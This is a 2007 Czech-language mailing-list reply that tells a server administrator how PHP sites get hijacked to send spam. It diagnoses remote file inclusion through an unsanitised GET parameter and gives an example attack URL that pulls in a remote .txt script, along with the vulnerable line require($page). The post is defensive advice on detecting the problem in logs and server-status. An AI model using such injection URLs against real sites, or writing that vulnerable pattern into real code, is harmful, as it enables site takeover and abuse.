spam z webu...
Bc. Radek Krejca
radek at ceskedomeny.cz
Mon Feb 5 23:52:14 CET 2007
Dobry den,
5. února 2007, 22:29:29, jste napsal(a):
LM> Zdravim vsetkych,
LM> vedel by ma niekto *nasmerovat/nakopnut*, ako si poradit zo spamom
LM> generovanym z php scriptu weboveho servera? Viem, ze otazka je velmi
LM> vseobecna, ale neviem co mam v podstate hladat, nakolko nemam velke
LM> znalosti z php. Jedno vsak viem urcite, ze sa to deje cez web, lebo ked
LM> odstavim web server (apache) tak to prestane. Neviem, co si kto zo
LM> zakaznikov nasadil, mnoho vsak z nich pouziva opensource aplikacie a
LM> tazko sa mi v nich patra. Deje sa mi to uz par dni a neviem co s tym.
Resim toto jiz nejakou dobu, s oblibou se tak deje pres neosetreny
vstup do include metodou GET. Klasicky a stale dokola mnou reseny
problem vypada takto:
http://www.domenaxx.xx/?page=http://www.geocities.com/secureserver50/Bigdoz.txt?
namisto zadaneho, lec neosetreneho:
http://www.domenaxx.xx/?page=kontakty
V kodu php to pak vypada nejak takto:
require($page);
coz je prisernost, ale pouziva to asi 90% lidi, co znam. Muze pomoct
cvicne si zapnout na apachi server-status, tam je videt takto
formulovany http request, je to videt v logu http serveru, da se to
dohledat.
To je ovsem problem php obecne, nezalezi na operacnim systemu.
--
S pozdravem,
Bc. Radek Krejca
STARNET, s. r. o.
radek at ceskedomeny.cz
More information about the Users-l
mailing list